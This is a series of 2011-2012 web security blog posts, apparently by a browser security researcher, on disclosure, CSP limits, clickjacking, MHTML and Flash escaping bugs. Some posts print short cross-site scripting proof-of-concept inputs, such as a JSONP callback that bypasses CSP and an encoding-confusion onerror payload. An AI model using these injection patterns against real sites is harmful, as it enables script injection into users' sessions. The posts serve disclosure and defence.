We all agree that bug-free products are not a realistic goal, but reducing the availability of information is probably also an ill-advised one. If it's still possible to write an exploit, and just "expensive" to do so - for example, because the knowledge on how to bypass ASLR is not common - then indeed, unskilled attackers will be less likely to go after your mom's credit card information; but going after her bank will be a fair game.

As for unintended consequences: in this scenario, the bank no longer has to deal with a steady stream of nuisance malware, so they probably care less about patching and monitoring, and the attacker is more likely to succeed.

Sure, one shouldn't be running on a vulnerability response treadmill. We can escape it to some extent simply by making the process more agile and lightweight. It is also very important to reduce the likelihood of malicious exploitation, but we should do so by tweaking factors other than the "cost" of acquiring domain-specific knowledge. We should embrace proactive approaches such as sensible coding practices, developer education, fuzzing, or tools such as ASLR, JIT randomization, and sandboxing - and when something slips through the cracks, we need to be thankful for the data point and simply make our solution more robust. Let's not obsess about what specific flavor of disclosure policies the researchers believe in: they haven't sold it to the highest bidder, and that's already pretty good.

"We have patched hundreds of CVEs over the last year. But, very, very few exploits have been written against those vulnerabilities. Over the past 24 months, we’ve seen about two dozen actual exploits."

That's a frighteningly high number of exploits, by the way.

January 10, 2012

p0f is back!

I decided to spend some time rewriting and greatly improving my ancient but strangely popular passive fingerprinting tool: Version 3 is a complete rewrite, bringing you much improved SYN and SYN+ACK fingerprinting capabilities, auto-calibrated uptime measurements, completely redone databases and signatures, new API design, IPv6 support (who knows, maybe it even works?), stateful traffic inspection with thorough cross-correlation of collected data, application-level fingerprinting modules (for HTTP now, more to come), and a lot more.

December 19, 2011

Notes about the post-XSS world

Content Security Policy is gaining steam, and we've seen a flurry of other complementary approaches that share a common goal: to minimize the impact of markup injection vulnerabilities by preventing the attacker from executing unauthorized JavaScript. We are so accustomed to thinking about markup injection in terms of cross-site scripting that we don't question this approach - but perhaps we should?

This collection of notes is a very crude thought experiment in imagining the attack opportunities in a post-XSS world. The startling realization I had by the end of that half-baked effort is that the landscape would not change that much: The hypothetical universal deployment of CSP places some additional constraints on what you can do, but the differences are not as substantial as you may suspect. In that sense, the frameworks are conceptually similar to DEP, stack canaries, or ASLR: They make your life harder, but reliably prevent exploitation far less frequently than we would have thought.

Credit where credit is due: The idea for writing down some of the possible attack scenarios comes from Mario Heiderich and Elie Bursztein, who are aiming to write a more coherent and nuanced academic paper on this topic, complete with vectors of their design, and some very interesting 0-day bugs; I hope to be able to contribute to that work. In the meantime, though, it seems that everybody else is thinking out loud about the same problems - including Devdatta Akhawe and Collin Jackson - so I thought that sharing the current notes may be useful, even if the observations are not particularly groundbreaking.

December 10, 2011

X-Frame-Options, or solving the wrong problem

On modern computers, JavaScript allows you to exploit the limits of human perception: you can open, reposition, and close browser windows, or load and navigate away from specific HTML documents, without giving the user any chance to register this event, let alone react consciously.

I have discussed some aspects of this problem in the past: my recent entry showcased an exploit that flips between two unrelated websites so quickly that you can't see it happening; and my earlier geolocation hack leveraged the delay between visual stimulus and premeditated response to attack browser security UIs.

A broader treatment of these problems - something that I consider to be one of the great unsolved problems in browser engineering - is given in "The Tangled Web". But today, I wanted to showcase another crude proof-of-concept illustrating why our response to clickjacking - and the treatment of it as a very narrow challenge specific to mouse clicks and <iframe> tags - is somewhat short-sighted. So, without further ado:

There are more complicated but comprehensive approaches that may make it possible for web applications to ensure that they are given a certain amount of non-disrupted, meaningful screen time; but they are unpopular with browser vendors, and unlikely to fly any time soon.

December 08, 2011

The old switcharoo

Another tiny proof-of-concept for the day: While the idea is fairly trivial, it seems pretty frightening to me - and neatly illustrates one of the points I'm making in The Tangled Web. I highly doubt that even the most proficient and attentive users would be able to spot this happening in the wild.

(If you don't get it, try again, and follow instructions on the screen.)

Interesting results can be also achieved in some browsers with history.back(), but I'll leave this as an exercise for readers. The same goes for the implications it has for clickjacking, drag-and-drop, and other attacks normally associated with frames.

PS. Another silly proof-of-concept as a bonus: click here.

December 02, 2011

CSS :visited may be a bit overrated

OK, second time is a charm. This script is probably of some peripheral interest: In the past two years or so, a majority of browser vendors decided to take a drastic step of severely crippling CSS :visited selectors in order to prevent websites from stealing your browsing history.

It is widely believed that techniques such as cache timing may theoretically offer comparable insights, but the attacks demonstrated so far seemed unconvincing. Among other faults, they relied on destructive, one-shot testing that altered the state of the examined cache; produced only probabilistic results; and were far too slow and noisy to be practically useful. Consequently, no serious attempts to address the underlying weakness have been made.

My proof of concept is fairly crude, and will fail for a minority of readers; but in my testing, it offers reliable, high-performance, non-destructive cache inspection that blurs the boundary between :visited and all the "less interesting" techniques.

November 15, 2011

"The Tangled Web" is out

Okay, okay, it's official. You can now buy The Tangled Web from Amazon, Barnes & Noble, and all the other usual retailers for around $30. You can also order directly from the publisher, in which case, discount code 939758568 gets you 30% off.

No Starch provides a complimentary, DRM-free PDF, Mobi, and ePub bundle with every paper copy; you can also buy e-book edition separately. Kindle and other third-party formats should be available very soon.

More info about the book itself, including a sample chapter, can be found on this page.

November 04, 2011

In praise of anarchy: metrics are holding you back

It is a comforting to think about information security as a form of computer science - but the reality of securing complex enterprises is as unscientific as it gets. We can theoretize how to write perfectly secure software, but no large organization will ever be in a meaningful vicinity of that goal. We can also try to objectively measure our performance, and the resilience of our defenses - but by doing so, we casually stroll into a trap.

Why? I think there are two qualities that make all the difference in our line of work. One of them is adaptability - the capacity to identify and respond to new business circumstances and incremental risks that appear every day. The other is agility - the ability to make changes really fast. Despite its hypnotic allure, perfection is not a practical trait; in fact, I'm tempted to say that it is not that desirable to begin with.

Almost every framework for constructing security metrics is centered around that last pursuit - perfection. It may not seem that way, but it's usually the bottom line: the whole idea is to entice security teams to define more or less static benchmarks of their performance. From that follows the focus on continually improving the readings in order to demonstrate progress.

Many frameworks also promise to advance one's adaptability and agility, but that outcome is very seldom true. These two attributes depend entirely on having bright, inquisitive security engineers thriving in a healthy corporate culture. A dysfunctional organization, or a security team with no technical insight, will find false comfort in a checklist and a set of indicators - but will not be able to competently respond to the threats they need to worry about the most.

A healthy team is no better off: they risk being lulled into complacency by linking their apparent performance to the result of a recurring numerical measurement. It's not that taking measurements is a bad idea; in fact it's an indispensable tool of our trade. But using metrics as long-term performance indicators is a very dangerous path: they do not really tell you how secure you are, because we have absolutely no clue how to compute that. Instead, by focusing on hundreds of trivial and often irrelevant data points, they take your eyes off the new and the unknown.

And this brings me to the other concern: the existence of predefined benchmarks impairs flexibility. Quite simply, yesterday's approach, enshrined in quarterly statistics and hundreds of pages of policy docs, will always overstay it welcome. It's not that the security landscape is constantly undergoing dramatic shifts; but if you don't observe the environment and adjust your course and goals daily, the errors do accumulate... until there is no going back.

October 28, 2011

Good news, everyone!

No Starch Press just posted a sample chapter for The Tangled Web. You can grab the PDF here and see what it's all about. The book itself should be available by November 15; you can also preorder on Amazon.

If you don't know what this is all about, you can also head over to the home page of the book; but the bottom line is that I think it's the first-ever reasonably detailed examination of the browser security model and its evolution through the years - and really, that's something you just need to know to develop modern web apps.

PS. It's apparently always April Fools' at Microsoft!

October 02, 2011

An origin is forever

This post is inspired chiefly by the work of Artur Janc.

The Internet is a pretty seedy place, yet we are quite willing to hand over our secrets to a small group or trusted web apps. Heck, in recent years, we also started giving them capabilities: social networking sites often get to see your geolocation, and your instant messenger may be able to access your microphone or webcam feeds. Some of this does not even require your initial consent: certain browsers and plugins come with hardcoded domains that are permitted to install software updates, or change system settings at a whim.

The push toward web application capabilities is somewhat frightening once you realize that the boundaries between web applications are very poorly defined, and that nobody is trying to solve that uncomfortable problem first. Look at the scoping rules for JavaScript DOM access, for HTTP cookies, and for auxiliary mechanisms such as password managers: they not only differ substantially, but routinely interfere with each other in destructive ways. Compartmentalizing complex web applications should be a breeze, but instead, it's an impenetrable form of art.

Worse, content isolation on the web is very superficial - so even if the boundaries can be drawn, most types of privileged contexts can't distance themselves from the rest of the world, and expose just a handful of well-defined APIs. Instead, every non-trivial web application needs to heavily compensate for the risk of clickjacking, cross-request forgery, reflected cross-site scripting, and dozens of other attacks of that sort. All the developers eventually fail, by the way: show me a domain with no history of XSS, and I will show you a web application nobody cares about.

Unlike some other tough challenges in browser engineering, the risks of living with privileged applications could mitigated fairly nicely simply by requiring some effort up front: even without inventing any new security mechanisms, you could require applications to use origin cookies, have a sensible CSP policy, and use HSTS, before being allowed to prompt for extra privileges. It's not impossible to do something meaningful - it's just unpopular with the creators of privileged APIs.

But the problems with the clarity of robustness of application boundaries aside, there is also a third, perhaps more fascinating issue: what do you do if your web application execution context becomes corrupted in some way? As it turns out, there is no mechanism for the server to say that from now on, it wants to have a clean slate, and that the browser should drop or at least isolate any already running code, or previously stored data.

This seemingly odd wish is actually critical to web application security. For example, let's assume there is an XSS vulnerability in a web mail system or a social networking application. Because of the convenient but unfortunate design of HTML, such vulnerabilities are unavoidable, but we seldom wonder if it's possible to cleanly and predictably recover from them. Intuitively, patching the underlying bug, invalidating session cookies, and perhaps forcing password change, is all it should take; in fact, applications using httponly cookies can often skip the last two steps.

Alas, an once-compromised web origin can stay tainted indefinitely. At the very minimum, the attacker is in full control for as long as the user keeps the once-affected website open in any browser window; with the advent of portable computers, it is not uncommon for users to keep a single commonly used website open for weeks. During that period, there is nothing the legitimate owner of the site can do - and in fact, there is no robust way to gauge if the infection is still going on. And hey, it gets better: if content from the compromised origin is commonly embedded on third-party pages (think syndicated "like" buttons or advertisements), with some luck, attacker's JavaScript may become practically invincible, surviving closing the original application and the deletion of browser cache. If that doesn't give you a pause, it should.

And let's not forget open wireless networks: the problem there is about as bad. It does not matter that you are not logged into anything sensitive while visiting Starbucks. An invisible frame, a strategic write to localStorage, or a bit of DNS or cache poisoning, is all it takes for the attacker to automatically elevate his privileges the moment you return to a safe environment and log back in.

With all that, and with the proliferation of mechanisms such as web workers and offline apps, we are rapidly approaching a point where recovering from a trivial XSS bug and other common web security lapses is getting almost as punishing as recovering from RCE - and for no good reason, too. Sure: today, it's so easy to phish users or exploit real RCE bugs, that backdooring web origins is not worth the effort. But in a not-too-distant future, that balance may shift.

September 09, 2011

Critical (of) severity

You can tell when a person is desperate to appear authoritative: they often litter their speech with unnecessary, roundabout verbiage. To some listeners, this sounds smart. To many others, it's obtuse and pompous.

I think that one of the cornerstones of vulnerability management is just an example of that. I am talking about the concept of vulnerability severities: I believe that they serve no real purpose, other than obfuscating the true intent of speech.

It's not that we don't need a codified taxonomy; but the term "severity" and the abstract levels attached to it ("critical", "high", "medium", "low") are a remarkably poor proxy for what we actually want to say.

The notion of severity is used in two distinct settings:

  • In a position of authority: For example, when an internal security team is communicating with developers. In this case, the intent of assigning severity is to instruct the developer to do one of the following:

    • Drop all other work and fix the bug now.
    • Fix the issue in a couple of days.
    • Fix at own leisure, or not at all.

  • In an advisory position: Say, when a vendor is notifying end users about the availability of a fix. In this case, the actual message usually is any of the following:

    • You are in imminent danger. Patch now.
    • You are at a limited risk, but prompt action is advisable.
    • We don't think there is a substantial risk.
Every time, the messages are very simple. Yet, instead of just saying it out loud, we create one set of guidelines for the security team to map their assessment to an ambiguous codeword; and then furnish a second lengthy phrasebook for the final recipient of a message, to map the codeword to something they can act on.

Only we're not running a numbers station: we're trying to tell people something very important, and we need them to understand us right away. There is no way around the fact that terms such as "critical" or "high" intuitively mean different things to different people, and almost certainly not just the thing you actually wanted to say. If the severity needs to be accompanied with several pages of organization-specific explanatory text, something is horribly wrong.

Instead of "highly critical", just start telling your users "patch right away".

August 29, 2011

So you want to write a security book?

Now that I am done with my side project, I wanted to post a note about something that my colleagues frequently ask about: the reality of publishing a security-themed book.

The most important advice I can give is to start with a reality check: writing for technical audiences will probably not make you rich. You will invest somewhere between 200 and 1,000 hours of work over the course of several months. In the next two years, you will likely sell from 1,000 to 50,000 copies (10,000 is pretty good already). Your cut is between $2 and $5 per copy (that's 10-20% of the actual sale price, which in turn is usually around 50% of the cover price); proportionally less if there are multiple authors involved.

The bottom line is that your motivation needs to be something other than money. If there are no quality, up-to-date reference materials in your field of expertise, or if you just have something interesting to share, go for it. If you just want to earn some cash, random consulting gigs would net you more.

If you are still serious about the plan, the next step is choosing between a traditional publisher, and doing all the work yourself. I recommend the former. There are some reputable self-published security books (say, Fyodor's), and if you pursue this route, you will be able to get a slightly larger slice of the revenue pie. That said, you lose some important benefits:

  • You will not get professional editorial feedback. Having an independent sanity check from a person who publishes books for a living helps you set the style and flow of the chapters, and arrange them reasonably. This is harder than it seems. Even the best ideas look bad when presented poorly.

  • You will have to take care of technical illustrations, page layout, indexes, and so on - requiring some talent, and easily adding 50-100 hours of work into the mix.

  • You will have to pay for technical editing and proofreading - or ship the book with typos and grammar errors, which never helps.

  • You will have to invest some effort into marketing, accounting, etc.
If you have a decent proposal, you can approach publishers out of the blue, and pick the one you want to work with; for time being, the demand for infosec authors seems to be higher than the supply. All the publishers will all offer you roughly the same financial terms, but there are some interesting differences in what you will get in return. I know quite a few authors signed up with one of the major publishing houses, and very unhappy about not receiving any editorial attention past the first chapter or two; or not being able to get an illustrator assigned to the project, and having to do the work themselves. In these cases, one has to wonder what the publisher is doing to earn its fees.

So, ask around. For example, in comparison to said publisher, my experiences with No Starch Press have been very good.

August 26, 2011

The subtle / deadly problem with CSP

Content Security Policy is a promising new security mechanism deployed in Firefox, and on its way to WebKit. It aims to be many things - but its most important aspect is the ability to restrict the permissible sources of JavaScript code in the policed HTML document. In this capacity, CSP is hoped to greatly mitigate the impact of cross-site scripting flaws: the attacker will need to find not only a markup injection vulnerability, but also gain the ability to host a snippet of malicious JavaScript in one of of the whitelisted locations. Intuitively, that second part is a much more difficult task.

Content Security Policy is sometimes criticized on the grounds of its complexity, potential performance impact, or its somewhat ill-specified scope - but I suspect that its most significant weakness lies elsewhere. The key issue is that the granularity of CSP is limited to SOP origins: that is, you can permit scripts from, or perhaps from a wildcard such as * - but you can't be any more precise. I am fairly certain that in a majority of real-world cases, this will undo many of the apparent benefits of the scheme.

To understand the problem, it is important to note that in modern times, almost every single domain (be it or hosts dozens of largely separate web applications consisting of hundreds of unrelated scripts - quite often including normally inactive components used for testing and debugging needs. In this setting, CSP will prevent the attacker from directly injecting his own code on the vulnerable page - but will still allow him to put the targeted web application in a dangerously inconsistent state, simply by loading select existing scripts in the incorrect context or in an unusual sequence. The history of vulnerabilities in non-web software strongly implies that program state corruption flaws will be exploitable more often than we may be inclined to suspect.

If that possibility is unconvincing, consider another risk: the attacker loading a subresource that is not a genuine script, but could be plausibly mistaken for one. Examples of this include an user-supplied text file, an image with a particular plain-text string inside, or even a seemingly benign XHTML document (thanks to E4X). The authors of CSP eventually noticed this unexpected weakness, and decided to plug the hole by requiring a whitelisted Content-Type for any CSP-controlled scripts - but even this approach may be insufficient. That's because of the exceedingly common practice of offering publicly-reachable JSONP interfaces for which the caller has the ability to specify the name of the callback function, e.g.:

GET /store_locator_api.cgi?zip=90210&callback=myResultParser HTTP/1.0

HTTP/1.0 200 OK
Content-Type: application/x-javascript
myResultParser({ "store_name": "Spacely Space Sprockets",
                 "street": ... });
Having such an API anywhere within a CSP-permitted origin is a sudden risk, and may be trivially leveraged by the attacker to call arbitrary functions in the code (perhaps with attacker-dependent parameters, too). Worse yet, if the callback string is not constrained to alphanumerics – after all, until now, there was no compelling reason to do so – specifying callback=alert(1);// will simply bypass CSP right away.

The bottom line is that CSP will require web masters not only to create a sensible policy, but also thoroughly comb every inch of the whitelisted domains for a number of highly counterintuitive but potentially deadly irregularities like this. And that's the tragedy of origin scoping: if people were good at reviewing their sites for subtle issues, we would not be needing XSS defenses to begin with.

April 09, 2011

Using View > Encoding can kill you (in a manner of speaking)

Here's an interesting tidbit: you should never use the View > Encoding menu in any browser unless you fully trust the visited website.

Picking an alternative encoding through that menu overrides the character set not only for the top-level document, but also for all the nested frames - even if they happen to be cross-domain or hidden from view. And that may very well enable the owner of the visited page to carry out an XSS attack against a random third-party application without your knowledge.

Most security researchers associate encoding-related XSS problems with UTF-7, a somewhat preposterous and unnecessary encoding scheme that, by design, allows overlong encoding of 7-bit ASCII values (with disastrous consequences for HTML parsing). Not all browsers support UTF-7, and users are not likely to make that choice in the aforementioned menu. So, we're fine, right?

Well, not exactly. Many other, still popular multi-byte encodings, including Shift JIS or EUC-*, are also fairly problematic: their parsers often suffer from character consumption bugs, and in contrast to UTF-8, relatively little attention has been given to cleaning this up.

For example, with forced Shift JIS, this input is likely to be exploitable:

<img src="[0xE0]">
  ...this is still a part of the markup...
  " onerror="alert('Hi mom!')" x="
Simple demo here.

March 12, 2011

Pwn2own considered (somewhat) harmful

I think that hacking challenges and bug bounty programs can be extremely valuable. This is true when they involve transparent, sustained efforts to evaluate the security of a particular platform. For example, I believe that there is a substantial value in Mozilla bug bounties, or in the Chrome reward program. These programs greatly improve the security of the browsers in question, occasionally advance our understanding of web security, and provide tons of statistical data about vendor response processes and attitudes toward security flaws. That last part is arguably the most important metric when dealing with code so complex that for better or worse, it is unlikely to ever be perfectly safe.

I also think that Pwn2own, an annual browser hacking contest run by TippingPoint, does not deliver the same value. The formula of the contest boils down to this: once a year, a single, secretly developed exploit is exchanged for a substantial amount of money. No information about the flaw or its back story is revealed in the process, and given that this trade is negligible in comparison to the annual volume of browser vulnerabilities, there is absolutely no intrinsic value in observing it.

That, alone, is not a compelling criticism; at best, it's a reason not to watch. But then, there are some negative consequences, too: it is in the interest of the conference and contest organizers, and the participating researchers, to get publicity for their findings - and journalists, who do not necessarily have a holistic view of the day-to-day browser security research, embrace such high-profile developments with disproportionate enthusiasm. The resulting ecstatic press coverage ultimately undermines any attempt to have a meaningful and reasonable discussion about the state of browser security.

Take this quote, which likely will be repeated in every Safari-related story for the next twelve months:

"A team was able to exploit Safari to exploit a MacBook Air in five seconds. Yes, five seconds - less time than it takes most people just to type 'Safari got hacked in less than five seconds'."

That's remarkable, but also completely wrong. It takes days or weeks to find and exploit a vulnerability, and Pwn2own is no exception: the actual exploits are prepared months or weeks in advance, and simply executed on the day the contest takes place. I do not think there is a single person in the information security industry who would say that the discovery of a normal browser vulnerability is a notable event: several hundred such flaws are discovered and resolved every year in every browser, as evidenced by release notes maintained by the vendors with varying degrees of accuracy. Neither the fact that somebody discovered a vulnerability before Pwn2own, nor that this person needed needed five seconds to execute that pre-made code, is a useful measure of anything.

Similarly, the survival of Firefox and Chrome intuitively makes me happy, because I know that these browsers give a lot of thought to security - but I do not think that Pwn2own is a meaningful testament to this. Perhaps these two vendors merely patched up the vulnerability somebody wanted to use, and there was not enough time to find a new one. Or perhaps nobody attending the event (which brings together only a tiny fraction of the infosec community) had the expertise and the inclination to target this particular browser.

Yes, there are vendors who lag behind the rest when it comes to vulnerability response and proactive security work; and there are some hard problems we still have to solve to make the web a safer environment. But the headlines inspired by Pwn2own (and probably encouraged by the organizers) are very unfair, and unnecessarily alienate the parties who should be paying attention to their security posture. Investigating real data, and asking some hard-hitting questions, can make more of a difference... and if done right, it can be more fun.

March 11, 2011

A note on an MHTML vulnerability

There is an ongoing discussion about a recently disclosed, public vulnerability in Microsoft Internet Explorer, and its significance to web application developers. Several of my colleagues investigated this problem in the past few weeks, and so, I wanted to share our findings.

As some of you may be aware, Microsoft Internet Explorer supports MHTML, a simple container format that uses MIME encapsulation (nominally multipart/related) to combine several documents into a single file. Each container may consist of a number of possibly base64-encoded documents, with their content type determined solely by the inline MIME data.

Perhaps by the virtue of not having cross-browser support, the MHTML format is not commonly used on the web - but it is employed by Internet Explorer itself to save downloaded pages to disk; and embraced by some third-party applications to deliver HTML-based documentation and help files.

To facilitate access to MHTML containers, the browser also supports a special mhtml: URL scheme, followed by a fully-qualified URL from which the document is to be retrieved; a "!" delimiter; and the name of the target resource inside the container. Unfortunately, when MHTML containers are accessed over protocols that provide other, normally authoritative means for specifying document type (e.g. Content-Type in HTTP traffic), this protocol-level information is ignored, and a very lax MIME envelope parser is invoked on the retrieved document, instead. The behavior of this parser is not documented, but it appears that in many cases, adequately sanitized user input appearing on HTML pages, in JSON responses, CSV exports, image metadata, and so forth, is sufficient to trick it into treating the underlying document as valid MHTML. All that is needed to keep this parser happy is the ability to place several alphanumeric and punctuation characters on the target page, in several separate lines.

The payload inside such an unintentionally served "MHTML container" is able to execute JavaScript, and has same-origin DOM access to the originating domain; with some minimal effort, it is also able to access to domain-specific cookies. Therefore, this behavior essentially represents a universal cross-site scripting flaw that affects a significant proportion of all sensitive web applications on the Internet.

Based on this 2007 advisory, it appears that a variant of this issue first appeared in 2004, and has been independently re-discovered several times in that timeframe. In 2006, the vendor reportedly acknowledged the behavior as "by design"; but in 2007, partial mitigations against the attack were rolled out as a part of MS07-034 (CVE-2007-2225). Unfortunately, these mitigations did not extend to a slightly modified attack published in the January 2011 post to the full-disclosure@ mailing list.

It appears that the affected sites generally have very little recourse to stop the attack: it is very difficult to block the offending input patterns perfectly, and there may be no reliable way to distinguish between MHTML-related requests and certain other types of navigation (e.g., <embed> loads). A highly experimental server-side workaround devised by Robert Swiecki may involve returning HTTP code 201 Created rather than 200 OK when encountering vulnerable User-Agent strings - as these codes are recognized by most browsers, but seem to confuse the MHTML fetcher itself.

Until the problem is addressed by the vendor through Windows Update, I would urge users to consider installing a FixIt tool released by Microsoft as an interim workaround.

Update: see this announcement for more.

March 06, 2011

The other reason to beware

Adobe Flash has a function called, which implements a JavaScript bridge to the hosting page. It takes two parameters: the first one is the name of the JavaScript function to call. The second one is a string to pass to this function.

It is understood that the first parameter should not be attacker-controlled (of course, mistakes happen :-). It is also understood that there is no inherent harm in putting user input in the second parameter, if the callback function itself is not behaving stupidly; in fact, Adobe documentation gives an example that follows this very pattern:

  ..."sendToJavaScript", input.text);

Such a call would be translated to an eval(...) statement injected on the embedding page. This statement looks roughly the following way:

  try {
    __flash__toXML(sendToJavaScript, "value of input.text"));
  } catch (e) {

When writing the supporting code behind this call, the authors remembered to use backslash escaping when outputting the second parameter: hello"world becomes hello\"world. Unfortunately, they overlooked the need to escape any stray backslash characters, too.

So, try to figure out what happens if the value of input.text is set to the following string:

  Hello world!\"+alert(1)); } catch(e) {} //

I reported this problem to Adobe in March 2010. In March 2011, after following up, I received the following response:

"We have not made any change to this behavior for backwards compatibility reasons."

Caveat emptor :-)

Warning: OBJECT and EMBED are inherently unsafe

Let's say that you maintain an online discussion forum. Assuming that you explicitly specify the type= parameter in your <object> or <embed> markup, what are the security consequences of allowing users to embed third-party Flash movies in their posts when you enforce the appropriate security restrictions on your end (allowScriptAccess, allowNetworking, allowFullScreen all set to none)? Or, to make things simpler, how about permitting a straightforward video file, with type=video/x-ms-wmv?

If you think this is safe, you may want to know that the HTML5 spec has a different view. The specification effectively takes away the ability for any single party to decide how a particular plugin document should be handled by the browser. Under the new algorithm, instead of your funny cat video, you may accidentally end up embedding Java, which has unconditional access to the DOM of the embedding page through DOMService. Whoops, looks like you are owned now.

According to the spec, if your visitor's browser has, say, a Windows Media Player plugin that recognizes the type=video/x-ms-wmv value on your webpage, that plugin will be used regardless of Content-Type. This part is intuitive. Alas, if the plugin is not found, the specification compels the software to look at Content-Type next, giving the hosting party an opportunity to override the intent specified on your end.

To further complicate the picture, in some circumstances, browsers may also ignore both type= and Content-Type values: for example, Internet Explorer and WebKit browsers will play Flash videos served with Content-Type: pants/whatever and loaded with type=certainly/not-flash just because a stray .swf file extension is spotted somewhere in the URL. The file name signal is problematic, as it can usually be tampered with by whoever provides the URL. This strategy brings a yet another player into the picture, and each party can sabotage the security assurances sought by the rest.

It would be more reasonable to keep the behavior of <object> and <embed> consistent with that of other type-specific subresource tags (e.g., <applet>, <img>, or <script>), and give control over how the document is rendered to whoever authored the markup. This approach is still not without peril, because it makes it impossible for some sites to indicate that a particular text/plain or image/jpeg response is not meant to be interpreted as a malicious applet. But that last problem can be fixed by requiring Content-Type and type= to match, perhaps through an opt-in mechanism controlled with a new HTTP header. And in any case, the proposed logic does not help.

In the end, the currently specified behavior seems highly counterintuitive, and undoes all the work plugin that vendors such as Adobe or Microsoft put into adding security controls to ensure that their plugin content is reasonably safe to embed across domains that do not fully trust each other.

Test cases here. Joshua Stein also reports that they confuse Flash-blocking tools.